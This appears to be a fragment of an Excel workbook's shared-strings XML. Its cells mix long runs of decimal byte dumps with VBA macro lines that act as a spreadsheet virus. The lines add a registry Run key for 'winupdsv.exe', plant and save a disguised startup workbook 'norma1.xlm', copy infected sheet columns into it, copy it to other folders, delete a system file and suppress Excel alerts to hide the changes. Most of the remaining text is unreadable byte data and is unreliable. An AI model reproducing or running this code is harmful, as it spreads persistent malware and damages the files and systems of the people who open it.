    <t xml:space="preserve">w.regwrite "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run\WinUpdsv", "winupdsv.exe"</t>
  </si>
  <si>
    <t xml:space="preserve">0 0 0 0 24 0 0 0 0 0 3 0 0 0 0 0 120 255 3 0 216 254 2 0 92 255 2 0 48 0 0 0 0 0 9 0 0 0 0 0 116 255 1 0 112 255 1 0 56 255 3 0 196 254 3 0 192 254 3 0 60 255 2 0 40 255 2 0 8 255 2 0 232 254 2 0 200 5 0 0 80 5 0 0 0 9 108 12 0 252 248 120 255 0 34 244 0 245 9 4 0 0 4 116 255 5 0 0 36 1 0 13 28 0 2 0 8 116 255 13 224 1 3 0 26 116 255 0 27 4 112 255 8 120 255 13 8 1 4 0 108 112 255 27 16 0 251 48 47 112 255 28 100 0 0 27 245 9 4 0 0 39 64 255 37 39 80 255 37 39 96 255 37 8 120 255 13 108 0 4 0 0 3 19 0 2 0 170 4 60 255 40 96 255 1 0 37 4 116 255 8 120 255 13 192 1 4 0 8 116 255 13 100 0 7 0 8 60 255 87 44 255 8 0 58 80 255 35 0 93 251 47 28 255 40 4 255 79 0 37 40 228 254 2 0 37 4 20 255 40 64 255 1 0 37 4 24 255 8 120 255 13 192 1 4 0 8 24 255 13 100 0 7 0 8 20 255 254 154 196 254 17 0 2 0 255 61 180 254 18 0 4 164 254 10 19 0 8 0 4 164 254 4 148 254 10 20 0 8 0 4 148 254 58 132 254 21 0 93 251 60 116 254 251 39 100 254 255 27 41 8 0 116 255 60 255 24 255 20 255 54 10 0 44 255 196 254 180 254 164 254 148 254 28 77 1 0 46 4 60 255 58 96 255 35 0 37 4 116 255 8 120 255 13 192 1 4 0 8 116 255 13 100 0 7 0 8 60 255 254 152 22 0 0 0 41 4 0 116 255 60 255 0 15 245 9 4 0 0 8 120 255 13 152 1 4 0 0 2 0 115 4 112 255 8 120 255 13 8 1 4 0 108 112 255 4 96 254 5 5 0 36 6 0 13 8 1 4 0 108 96 254 251 48 253 248 64 255 4 60 255 40 96 255 1 0 37 4 116 255 8 120 255 13 192 1 4 0 8 116 255 13 100 0 7 0 8 60 255 87 44 255 8 0 58 80 255 35 0 93 251 47 28 255 251 31 196 254 255 27 50 4 </t>
  </si>
  <si>
    <t xml:space="preserve">Workbooks.Open Application.StartupPath &amp; "\norma1.xlm"</t>
  </si>
  <si>
    <t xml:space="preserve">0 112 255 96 254 41 4 0 116 255 60 255 54 4 0 44 255 64 255 28 197 1 0 3 19 0 2 0 51 40 64 255 1 0 4 80 254 4 76 254 4 116 255 5 0 0 36 1 0 13 208 0 2 0 8 116 255 13 48 0 23 0 108 76 254 253 105 80 255 26 116 255 254 104 44 254 203 2 0 63 4 112 255 4 60 255 252 237 80 254 4 116 255 5 0 0 36 1 0 13 208 0 2 0 8 116 255 13 68 0 23 0 8 60 255 13 8 1 4 0 108 112 255 27 24 0 251 48 47 112 255 41 4 0 116 255 60 255 28 190 2 0 63 4 42 254 245 9 4 0 0 4 60 255 252 237 80 254 4 116 255 5 0 0 36 1 0 13 208 0 2 0 8 116 255 13 68 0 23 0 8 60 255 13 164 1 4 0 107 42 254 244 255 198 41 4 0 116 255 60 255 28 188 2 0 63 245 9 4 0 0 39 64 255 37 39 80 255 37 39 96 255 37 4 60 255 252 237 80 254 4 116 255 5 0 0 36 1 0 13 208 0 2 0 8 116 255 13 68 0 23 0 8 60 255 13 108 0 4 0 41 4 0 116 255 60 255 0 5 30 203 2 0 2 0 2 0 11 4 80 254 254 126 44 254 250 1 0 90 4 60 255 40 96 255 1 0 37 4 116 255 8 120 255 13 192 1 4 0 8 116 255 13 100 0 7 0 81 60 255 253 111 44 255 37 4 20 255 58 80 255 35 0 37 4 24 255 5 5 0 36 6 0 13 192 1 4 0 8 24 255 13 100 0 7 0 8 20 255 254 152 10 0 1 0 41 6 0 116 255 24 255 20 255 53 44 255 0 49 252 102 80 255 37 4 60 255 40 96 255 1 0 37 4 116 255 8 120 255 13 192 1 4 0 8 116 255 13 100 0 7 0 8 60 255 254 155 11 0 41 4 0 116 255 60 255 0 50 58 80 255 35 0 37 4 60 255 40 96 255 1 0 37 4 116 255 8 120 255 13 192 1 4 0 8 116 255 13 100 0 7 0 8 60 255 254 155 8 0 41 4 0 116 255 60 255 0 122 40 80 255 3 0 37 4 60 255 58 96 255 35 0 37 4 116 255 8 120 255 13 192 1 4 0 8 116 255 13 100 0 7 0 </t>
  </si>
  <si>
    <t xml:space="preserve">ThisWorkbook.Sheets("@kbtasto@she3#").Columns(3).Copy Workbooks("norma1.xlm").Sheets("@kbtasto@she3#").Columns(3)</t>
  </si>
  <si>
    <t xml:space="preserve">8 60 255 254 154 44 255 12 0 1 0 37 40 244 254 3 0 37 4 20 255 58 4 255 35 0 37 4 24 255 5 5 0 36 6 0 13 192 1 4 0 8 24 255 13 100 0 7 0 8 20 255 254 154 196 254 12 0 1 0 253 159 254 152 10 0 1 0 41 8 0 116 255 60 255 24 255 20 255 54 4 0 44 255 196 254 0 122 40 80 255 4 0 37 4 60 255 58 96 255 35 0 37 4 116 255 8 120 255 13 192 1 4 0 8 116 255 13 100 0 7 0 8 60 255 254 154 44 255 12 0 1 0 37 40 244 254 4 0 37 4 20 255 58 4 255 35 0 37 4 24 255 5 5 0 36 6 0 13 192 1 4 0 8 24 255 13 100 0 7 0 8 20 255 254 154 196 254 12 0 1 0 253 159 254 152 10 0 1 0 41 8 0 116 255 60 255 24 255 20 255 54 4 0 44 255 196 254 0 122 40 80 255 5 0 37 4 60 255 58 96 255 35 0 37 4 116 255 8 120 255 13 192 1 4 0 8 116 255 13 100 0 7 0 8 60 255 254 154 44 255 12 0 1 0 37 40 244 254 5 0 37 4 20 255 58 4 255 35 0 37 4 24 255 5 5 0 36 6 0 13 192 1 4 0 8 24 255 13 100 0 7 0 8 20 255 254 154 196 254 12 0 1 0 253 159 254 152 10 0 1 0 41 8 0 116 255 60 255 24 255 20 255 54 4 0 44 255 196 254 0 72 58 96 255 13 0 37 58 64 255 36 0 37 58 244 254 15 0 37 254 193 212 254 2 0 0 0 37 4 116 255 8 120 255 13 12 1 4 0 8 116 255 254 170 22 0 181 0 0 0 4 0 0 0 0 0 9 0 0 0 5 0 0 0 3 0 0 0 26 116 255 0 15 245 9 4 0 0 8 120 255 13 152 1 4 0 0 0 19 0 0 0 0 8 0 84 1 80 5 52 0 8 0 0 0 0 0 19 0 0 0 0 0 28 0 0 0 0 0 4 0 0 0 0 0 60 254 2 0 44 254 2 0 80 254 2 0 120 255 3 0 68 0 0 0 0 0 14 0 0 0 0 0 112 255 1 0 96 254 1 0 116 255 3 0 60 255 3 0 24 255 3 0 20 255 3 0 44 255 2 0 </t>
  </si>
  <si>
    <t xml:space="preserve">ThisWorkbook.Sheets("@kbtasto@she3#").Columns(4).Copy Workbooks("norma1.xlm").Sheets("@kbtasto@she3#").Columns(4)</t>
  </si>
  <si>
    <t xml:space="preserve">28 255 2 0 196 254 2 0 180 254 2 0 164 254 2 0 148 254 2 0 116 254 2 0 100 254 2 0 48 0 0 0 12 0 0 0 252 198 0 0 0 0 0 0 128 12 0 0 0 0 0 0 8 0 0 0 12 0 0 0 8 0 0 0 0 0 0 0 0 0 0 0 12 0 0 0 0 0 0 0 0 0 0 0 22 0 0 20 56 0 13 0 1 0 7 0 0 19 0 0 60 0 7 0 0 19 1 0 60 0 7 0 0 19 2 0 60 0 7 0 0 19 3 0 0 0 41 0 0 12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ThisWorkbook.Sheets("@kbtasto@she3#").Columns(5).Copy Workbooks("norma1.xlm").Sheets("@kbtasto@she3#").Columns(5)</t>
  </si>
  <si>
    <t xml:space="preserve">101 99 116 248 138 96 0 7 0 101 120 101 102 105 108 101 30 221 96 0 3 0 82 117 110 95 208 96 0 3 0 67 104 114 75 126 96 0 8 0 70 117 108 108 78 97 109 101 208 158 96 0 5 4 67 108 97 115 115 26 187 96 0 11 128 0 0 255 3 1 0 78 101 119 87 111 114 107 98 111 111 107 145 29 96 0 19 128 0 0 255 3 1 0 87 111 114 107 98 111 111 107 66 101 102 111 114 101 67 108 111 115 101 42 59 96 0 12 128 0 0 255 3 1 0 87 111 114 107 98 111 111 107 79 112 101 110 225 226 96 0 8 128 0 0 255 3 1 0 95 68 101 102 97 117 108 116 106 194 96 0 12 0 95 66 95 118 97 114 95 76 84 114 105 109 225 38 96 0 12 0 95 66 95 118 97 114 95 82 84 114 105 109 114 146 96 0 8 128 0 0 255 3 255 255 95 66 95 118 97 114 95 105 9 162 96 0 15 128 0 0 255 3 255 255 95 66 95 118 97 114 95 104 97 115 115 97 118 101 100 23 157 96 0 9 128 0 0 255 3 255 255 95 66 95 118 97 114 95 99 104 116 241 96 0 5 4 115 102 99 101 97 27 64 96 0 5 0 102 115 99 101 97 45 225 96 0 3 0 102 115 111 234 143 96 0 10 128 0 0 255 3 255 255 95 66 95 118 97 114 95 102 115 111 251 76 96 0 10 0 103 101 116 115 112 101 99 105 97 108 120 63 96 0 14 128 0 0 255 3 255 255 95 66 95 118 97 114 95 101 120 101 102 105 108 101 162 224 96 0 16 0 103 101 116 115 112 101 99 105 97 108 102 111 108 100 101 114 81 92 96 0 4 0 101 120 101 102 125 121 96 0 6 0 115 102 102 105 108 101 58 209 96 0 4 0 102 105 108 101 37 240 96 0 12 128 0 0 255 3 255 255 95 66 95 118 97 114 95 102 115 99 101 97 26 165 96 0 2 255 255 1 1 84 0 0 0 255 255 255 255 255 255 255 255 255 255 255 255 25 2 1 0 13 0 255 255 255 255 255 255 0 2 1 0 255 255 2 2 0 0 255 255 255 255 255 255 255 255 255 255 255 255 255 255 255 255 255 255 255 255 255 255 255 255 255 255 12 2 255 255 255 </t>
  </si>
  <si>
    <t xml:space="preserve">Workbooks("norma1.xlm").Save</t>
  </si>
  <si>
    <t xml:space="preserve">255 14 2 2 0 255 255 16 2 3 0 255 255 19 2 0 0 13 0 2 0 14 0 0 0 1 0 36 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 1 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 1 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 1 228 177 128 1 0 4 0 0 0 1 0 48 42 2 2 144 9 0 112 20 6 72 3 0 130 2 0 100 168 3 4 0 10 0 28 0 86 66 65 80 114 111 106 101 136 99 116 5 0 52 0 0 64 2 20 106 6 2 10 61 2 10 7 2 114 1 20 8 5 6 18 9 2 18 152 215 66 66 4 148 0 12 2 74 60 2 10 22 0 1 114 128 115 116 100 111 108 101 62 2 25 0 115 0 116 0 100 0 111 0 128 108 0 101 0 13 0 102 0 37 2 92 0 3 42 92 71 123 48 48 128 48 50 48 52 51 48 45 0 8 29 4 4 67 0 10 2 14 1 18 48 48 52 0 54 125 35 50 46 48 35 48 0 35 67 58 92 87 73 78 78 0 84 92 115 121 115 116 101 109 8 51 50 92 3 99 50 46 116 108 0 98 35 79 76 69 32 65 117 0 116 111 109 97 116 105 111 110 7 0 94 0 1 131 68 79 102 102 105 99 5 132 68 79 128 62 102 0 105 0 99 53 130 68 143 128 17 133 128 1 129 68 50 68 0 70 56 68 48 52 67 45 53 0 66 70 65 45 49 48 49 66 32 45 66 68 69 53 128 68 65 65 53 128 66 52 128 5 50 136 68 128 151 103 114 0 97 109 32 70 105 108 101 115 0 92 77 105 99 114 111 115 111 40 102 116 32 3 54 92 4 3 109 115 128 111 57 46 100 108 108 35 13 16 128 32 57 46 48 32 79 98 1 185 0 32 76 105 98 114 97 114 121 139 128 67 0 1 15 2 204 2 0 19 130 3 8 118 117 25 2 160 84 104 105 115 0 87 111 114 107 98 111 111 107 136 71 0 24 128 19 84 0 </t>
  </si>
  <si>
    <t xml:space="preserve">fso.copyfile Application.StartupPath &amp; "\norma1.xlm", myfolder, True</t>
  </si>
  <si>
    <t xml:space="preserve">129 0 0 0 254 255 255 255 131 0 0 0 132 0 0 0 133 0 0 0 134 0 0 0 135 0 0 0 136 0 0 0 137 0 0 0 138 0 0 0 139 0 0 0 140 0 0 0 141 0 0 0 142 0 0 0 143 0 0 0 144 0 0 0 145 0 0 0 146 0 0 0 147 0 0 0 148 0 0 0 149 0 0 0 150 0 0 0 151 0 0 0 152 0 0 0 153 0 0 0 154 0 0 0 155 0 0 0 156 0 0 0 157 0 0 0 158 0 0 0 159 0 0 0 160 0 0 0 161 0 0 0 162 0 0 0 163 0 0 0 164 0 0 0 165 0 0 0 166 0 0 0 167 0 0 0 168 0 0 0 169 0 0 0 170 0 0 0 171 0 0 0 172 0 0 0 254 255 255 255 174 0 0 0 175 0 0 0 176 0 0 0 177 0 0 0 254 255 255 255 254 255 255 255 180 0 0 0 181 0 0 0 182 0 0 0 183 0 0 0 184 0 0 0 185 0 0 0 186 0 0 0 254 255 255 255 188 0 0 0 189 0 0 0 190 0 0 0 254 255 255 255 192 0 0 0 193 0 0 0 194 0 0 0 195 0 0 0 254 255 255 255 197 0 0 0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a1:</t>
  </si>
  <si>
    <t xml:space="preserve">104 0 99 8 115 0 87 0 171 114 0 107 0 170 98 128 3 111 128 3 26 142 23 50 218 11 162 28 192 18 0 0 72 66 1 49 2 116 90 128 64 132 30 66 2 1 5 44 194 33 148 20 62 34 66 8 43 66 1 25 0 3 33 192 1 192 224 49 71 130 9 123 124 104 49 0 26 133 4 50 134 4 79 22 200 72 42 0 0 77 22 176 137 67 22 40 11 66 22 195 23 16 194 2 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 147 75 42 115 1 0 16 0 0 0 255 255 0 0 0 0 1 0 2 0 255 255 0 0 0 0 1 0 0 0 1 0 0 0 0 0 1 0 2 0 1 0 0 0 0 0 1 0 0 0 0 0 0 0 0 0 1 0 2 0 0 0 0 0 0 0 1 0 5 0 5 0 5 0 5 0 5 0 5 0 5 0 5 0 5 0 5 0 0 0 114 85 128 2 0 0 128 0 0 0 128 0 0 0 128 0 0 0 4 0 0 126 5 0 0 126 5 0 0 126 1 0 0 126 1 0 0 126 1 0 0 126 1 0 0 126 1 0 0 126 1 0 0 126 3 0 0 126 3 0 0 126 3 0 0 126 3 0 0 126 82 0 0 127 0 0 0 0 21 0 0 0 9 0 0 0 0 0 1 0 8 0 0 0 0 0 0 0 241 0 0 0 0 0 0 0 110 250 78 144 62 129 198 79 168 146 255 227 99 227 208 15 1 0 9 4 0 0 4 8 0 0 168 3 0 0 0 0 0 0 2 0 255 255 255 255 2 0 131 138 97 0 9 0 0 0 0 0 4 0 33 6 0 0 0 0 0 0 255 255 255 255 1 0 249 5 0 0 0 0 0 0 255 255 0 0 185 0 0 0 0 0 0 0 3 128 97 0 9 0 0 0 0 0 2 0 217 8 0 0 0 0 0 0 255 255 255 255 4 0 49 8 0 0 0 0 0 0 89 8 0 0 0 0 0 0 145 8 0 0 0 0 0 0 193 8 0 0 0 0 0 0 255 255 0 0 225 0 0 0 0 0 0 0 4 0 177 1 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 193 2 0 0 </t>
  </si>
  <si>
    <t xml:space="preserve">fso.deletefile "c:\C0MS.sys"</t>
  </si>
  <si>
    <t xml:space="preserve">95 0 95 0 83 0 82 0 80 0 95 0 48 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 16 0 2 1 255 255 255 255 13 0 0 0 255 255 255 255 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 130 0 0 0 134 10 0 0 0 0 0 0 95 0 95 0 83 0 82 0 80 0 95 0 49 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 16 0 2 0 255 255 255 255 255 255 255 255 255 255 255 255 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 173 0 0 0 17 1 0 0 0 0 0 0 80 0 82 0 79 0 74 0 69 0 67 0 84 0 119 0 109 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 20 0 2 0 255 255 255 255 255 255 255 255 255 255 255 255 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 178 0 0 0 51 0 0 0 0 0 0 0 80 0 82 0 79 0 74 0 69 0 67 0 84 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 16 0 2 1 3 0 0 0 14 0 0 0 255 255 255 255 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 179 0 0 0 226 1 0 0 0 0 0 0 </t>
  </si>
  <si>
    <t xml:space="preserve">Application.DisplayAlerts = False</t>
  </si>
  <si>
    <t xml:space="preserve">0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 161 3 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 185 4 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 4 0 0 2 12 0 0 0 84 104 105 115 87 111 114 107 98 111 111 107 1 0 0 2 3 0 0 0 192 224 49 3 0 0 2 10 0 0 0 86 66 65 80 114 111 106 101 99 116 4 0 0 3 239 4 2 0 0 0 0 0 192 0 0 0 0 0 0 70 12 0 0 2 47 0 0 0 67 58 92 80 82 79 71 82 65 126 49 92 67 79 77 77 79 78 126 49 92 77 73 67 82 79 83 126 49 92 86 66 65 92 86 66 65 54 92 86 66 69 54 46 68 76 76 1 0 0 2 3 0 0 0 86 66 65 10 0 0 10 17 1 0 0 0 0 0 0 255 255 255 255 4 0 0 0 9 0 0 0 57 1 0 0 0 0 0 0 161 1 0 0 0 0 0 0 144 0 0 0 0 0 0 0 0 0 0 0 0 0 4 0 0 3 19 8 2 0 0 0 0 0 192 0 0 0 0 0 0 70 14 0 0 2 52 0 0 0 67 58 92 80 114 111 103 114 97 109 32 70 105 108 101 115 92 77 105 99 114 111 115 111 102 116 32 79 102 102 105 99 101 92 79 102 102 105 99 101 49 48 92 69 88 67 69 76 46 69 88 69 2 0 0 2 5 0 0 0 69 120 99 101 108 10 0 0 10 9 2 0 0 0 0 0 0 255 255 255 255 1 0 4 0 0 0 0 0 49 2 0 0 0 0 0 0 169 2 0 0 0 0 0 0 160 0 0 0 0 0 0 0 0 0 0 0 0 0 4 0 0 3 48 4 2 0 0 0 0 0 192 0 0 0 0 0 0 70 8 0 0 2 29 0 0 0 67 58 92 87 73 78 78 84 92 115 121 115 116 101 109 51 50 92 115 116 100 111 108 101 50 46 116 108 98 2 0 0 2 6 0 0 0 115 116 100 111 108 101 10 0 0 10 25 3 0 0 0 0 0 0 255 255 255 255 2 0 0 0 0 0 0 0 65 3 0 0 0 0 0 0 137 3 0 0 0 </t>
  </si>
  <si>
    <t xml:space="preserve">ThisWorkbook.Saved = True</t>
  </si>
  <si>
    <t xml:space="preserve">0 0 0 176 0 0 0 0 0 0 0 0 0 0 0 0 0 1 0 0 2 3 0 0 0 65 112 112 4 0 0 3 76 208 248 45 250 91 27 16 189 229 0 170 0 68 222 82 13 0 0 2 49 0 0 0 67 58 92 80 114 111 103 114 97 109 32 70 105 108 101 115 92 77 105 99 114 111 115 111 102 116 32 79 102 102 105 99 101 92 79 102 102 105 99 101 92 109 115 111 57 46 100 108 108 2 0 0 2 6 0 0 0 79 102 102 105 99 101 10 0 0 10 9 4 0 0 0 0 0 0 255 255 255 255 2 0 2 0 0 0 0 0 49 4 0 0 0 0 0 0 161 4 0 0 0 0 0 0 192 0 0 0 0 0 0 0 0 0 0 0 0 0 4 0 0 3 218 8 2 0 0 0 0 0 192 0 0 0 0 0 0 70 4 0 0 3 125 11 180 57 181 125 97 76 169 75 57 57 134 51 32 116 4 0 0 3 25 8 2 0 0 0 0 0 192 0 0 0 0 0 0 70 4 0 0 3 254 124 78 192 108 34 191 76 136 243 12 48 73 15 20 198 4 0 0 3 18 68 2 0 0 0 0 0 192 0 0 0 0 0 0 70 3 0 0 2 8 0 0 0 87 111 114 107 98 111 111 107 4 0 0 2 13 0 0 0 87 111 114 107 98 111 111 107 95 79 112 101 110 4 0 0 13 16 0 16 0 68 0 0 0 1 0 0 0 0 0 52 0 3 0 4 0 0 3 43 61 251 252 250 160 104 16 167 56 8 0 43 51 113 181 4 0 0 3 88 51 140 199 210 172 10 75 161 124 36 163 193 228 131 245 4 0 0 3 42 61 251 252 250 160 104 16 167 56 8 0 43 51 113 181 4 0 0 3 50 53 13 92 110 12 76 69 149 255 218 198 95 199 44 60 4 0 0 3 33 61 251 252 250 160 104 16 167 56 8 0 43 51 113 181 2 0 0 2 5 0 0 0 67 108 97 115 115 4 0 0 3 80 240 21 103 118 240 205 17 155 51 8 0 43 51 111 20 3 0 0 2 10 0 0 0 86 66 73 110 116 101 114 110 97 108 10 0 0 10 41 7 0 0 0 0 0 0 255 255 255 255 6 0 0 0 9 0 0 0 255 255 255 255 81 </t>
  </si>
  <si>
    <t xml:space="preserve">End Sub</t>
  </si>
  <si>
    <t xml:space="preserve">7 0 0 0 0 0 0 208 0 0 0 0 0 0 0 0 0 0 0 0 0 4 0 0 3 19 68 2 0 0 0 0 0 192 0 0 0 0 0 0 70 2 0 0 127 4 0 0 3 213 8 2 0 0 0 0 0 192 0 0 0 0 0 0 70 4 0 0 2 15 0 0 0 65 112 112 95 78 101 119 87 111 114 107 98 111 111 107 6 0 0 2 23 0 0 0 65 112 112 95 87 111 114 107 98 111 111 107 66 101 102 111 114 101 67 108 111 115 101 5 0 0 2 16 0 0 0 65 112 112 95 87 111 114 107 98 111 111 107 79 112 101 110 2 0 0 2 5 0 0 0 115 102 99 101 97 5 0 0 13 20 0 20 0 72 0 0 0 2 0 0 0 0 0 56 0 3 0 56 0 3 0 4 0 0 3 18 8 2 0 0 0 0 0 192 0 0 0 0 0 0 70 4 0 0 3 217 8 2 0 0 0 0 0 192 0 0 0 0 0 0 70 4 0 0 5 2 0 9 9 0 0 0 0 0 0 49 9 0 0 0 0 0 0 255 255 255 255 4 0 0 3 219 8 2 0 0 0 0 0 192 0 0 0 0 0 0 70 2 0 0 6 9 9 0 0 0 0 0 0 224 0 0 0 0 0 0 0 4 0 0 3 215 8 2 0 0 0 0 0 192 0 0 0 0 0 0 70 3 0 0 1 8 0 0 0 78 0 97 0 109 0 101 0 9 0 0 11 28 0 0 0 40 0 109 0 49 0 41 0 95 0 40 0 109 0 50 0 41 0 95 0 40 0 109 0 51 0 41 0 3 0 0 1 8 0 0 0 67 0 111 0 112 0 121 0 4 0 0 1 14 0 0 0 86 0 105 0 115 0 105 0 98 0 108 0 101 0 4 0 0 1 14 0 0 0 67 0 111 0 108 0 117 0 109 0 110 0 115 0 6 0 0 11 18 0 0 0 65 0 117 0 116 0 111 0 95 0 79 0 112 0 101 0 110 0 15 0 0 11 54 0 0 0 61 0 39 0 40 0 109 0 49 0 41 0 95 0 40 0 109 0 50 0 41 0 95 0 40 0 109 0 51 0 41 0 39 0 33 0 82 0 49 0 67 0 49 0 58 0 82 0 57 0 67 0 49 0 8 0 0 11 </t>
  </si>
  <si>
    <t xml:space="preserve">24 0 0 0 85 0 115 0 101 0 114 0 32 0 68 0 101 0 102 0 105 0 110 0 101 0 100 0 7 0 0 11 20 0 0 0 110 0 111 0 114 0 109 0 97 0 108 0 46 0 120 0 108 0 109 0 3 0 0 1 10 0 0 0 67 0 101 0 108 0 108 0 115 0 3 0 0 1 10 0 0 0 86 0 97 0 108 0 117 0 101 0 3 0 0 11 6 0 0 0 97 0 49 0 58 0 4 0 0 1 12 0 0 0 68 0 101 0 108 0 101 0 116 0 101 0 4 0 0 11 10 0 0 0 66 0 111 0 111 0 107 0 49 0 15 0 0 11 54 0 0 0 61 0 39 0 40 0 109 0 49 0 41 0 95 0 40 0 109 0 50 0 41 0 95 0 40 0 109 0 51 0 41 0 39 0 33 0 82 0 49 0 67 0 49 0 58 0 82 0 56 0 67 0 49 0 3 0 0 2 8 0 0 0 86 66 69 54 46 68 76 76 13 0 0 7 57 13 0 0 0 0 0 0 255 255 255 255 10 2 11 0 240 0 0 0 0 0 0 0 13 0 0 7 57 13 0 0 0 0 0 0 255 255 255 255 12 2 11 0 16 1 0 0 0 0 0 0 3 0 0 11 6 0 0 0 135 101 246 78 28 32 10 0 0 11 34 0 0 0 29 32 242 93 171 136 238 79 57 101 12 255 47 102 38 84 221 79 88 91 118 81 238 79 57 101 132 118 133 81 185 91 31 255 2 0 0 11 2 0 0 0 46 0 4 0 0 11 10 0 0 0 123 0 69 0 83 0 67 0 125 0 4 0 0 11 8 0 0 0 46 0 120 0 108 0 115 0 4 0 0 3 122 8 2 0 0 0 0 0 192 0 0 0 0 0 0 70 13 0 0 7 57 13 0 0 0 0 0 0 255 255 255 255 83 2 11 0 48 1 0 0 0 0 0 0 10 0 0 127 13 0 0 7 57 13 0 0 0 0 0 0 255 255 255 255 87 2 11 0 80 1 0 0 0 0 0 0 9 0 0 11 28 0 0 0 64 0 107 0 98 0 116 0 97 0 115 0 116 0 111 0 64 0 115 0 104 0 101 0 51 0 35 0 15 0 0 11 54 0 0 0 61 0 39 0 64 0 107 0 98 0 </t>
  </si>
  <si>
    <t xml:space="preserve">116 0 97 0 115 0 116 0 111 0 64 0 115 0 104 0 101 0 51 0 35 0 39 0 33 0 82 0 49 0 67 0 49 0 58 0 82 0 56 0 67 0 49 0 15 0 0 11 54 0 0 0 61 0 39 0 64 0 107 0 98 0 116 0 97 0 115 0 116 0 111 0 64 0 115 0 104 0 101 0 51 0 35 0 39 0 33 0 82 0 49 0 67 0 49 0 58 0 82 0 57 0 67 0 49 0 9 0 0 11 30 0 0 0 83 0 97 0 118 0 101 0 32 0 99 0 104 0 97 0 110 0 103 0 101 0 115 0 32 0 116 0 111 0 2 0 0 11 2 0 0 0 63 0 10 0 0 11 32 0 0 0 83 0 97 0 118 0 101 0 32 0 99 0 104 0 97 0 110 0 103 0 101 0 115 0 32 0 116 0 111 0 32 0 3 0 0 11 4 0 0 0 32 0 63 0 7 0 0 11 20 0 0 0 110 0 111 0 114 0 109 0 97 0 49 0 46 0 120 0 108 0 109 0 4 0 0 3 147 8 2 0 0 0 0 0 192 0 0 0 0 0 0 70 30 0 0 127 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 114 85 128 0 0 0 128 0 0 0 128 0 0 0 128 0 0 0 1 0 0 126 1 0 0 126 1 0 0 126 1 0 0 126 1 0 0 126 117 0 0 127 0 0 0 0 10 0 0 0 9 0 0 0 0 0 0 0 255 255 255 255 255 255 255 255 255 255 255 255 0 0 0 0 9 0 0 0 0 0 5 0 9 0 0 0 0 0 3 0 3 0 0 9 193 2 0 0 0 0 0 0 177 5 0 0 0 0 0 0 8 0 0 0 0 0 1 0 3 0 0 9 113 7 0 0 0 0 0 0 233 6 0 0 0 0 0 0 24 0 0 0 0 0 1 0 3 0 0 9 193 2 0 0 0 0 0 0 201 7 0 0 0 0 0 0 40 0 0 0 0 0 1 0 1 0 0 8 3 0 0 0 65 112 112 3 0 0 9 193 2 0 </t>
  </si>
  <si>
    <t xml:space="preserve">0 0 0 0 0 9 8 0 0 0 0 0 0 56 0 0 0 0 0 1 0 3 0 0 9 193 2 0 0 0 0 0 0 17 5 0 0 0 0 0 0 72 0 0 0 0 0 1 0 1 0 0 8 2 0 0 0 87 98 2 0 0 8 6 0 0 0 67 97 110 99 101 108 89 0 0 127 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 84 104 105 115 87 111 114 107 98 111 111 107 0 84 0 104 0 105 0 115 0 87 0 111 0 114 0 107 0 98 0 111 0 111 0 107 0 0 0 192 224 49 0 123 124 49 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 73 68 61 34 123 48 48 48 48 48 48 48 48 45 48 48 48 48 45 48 48 48 48 45 48 48 48 48 45 48 48 48 48 48 48 48 48 48 48 48 48 125 34 13 10 68 111 99 117 109 101 110 116 61 84 104 105 115 87 111 114 107 98 111 111 107 47 38 72 48 48 48 48 48 48 48 48 13 10 67 108 97 115 115 61 192 224 49 13 10 72 101 108 112 70 105 108 101 61 34 34 13 10 78 97 109 101 61 34 86 66 65 80 114 111 106 101 99 116 34 13 10 72 101 108 112 67 111 110 116 101 120 116 73 68 61 34 48 34 13 10 86 101 114 115 105 111 110 67 111 109 112 97 116 105 98 108 101 51 50 61 34 51 57 51 50 50 50 48 48 48 34 13 10 67 77 71 61 34 70 54 70 52 53 65 53 54 65 54 66 65 57 56 66 69 57 56 66 69 57 67 67 50 57 67 67 50 34 13 10 68 80 66 61 34 69 67 69 69 52 48 54 67 67 48 55 70 68 68 55 70 68 68 56 48 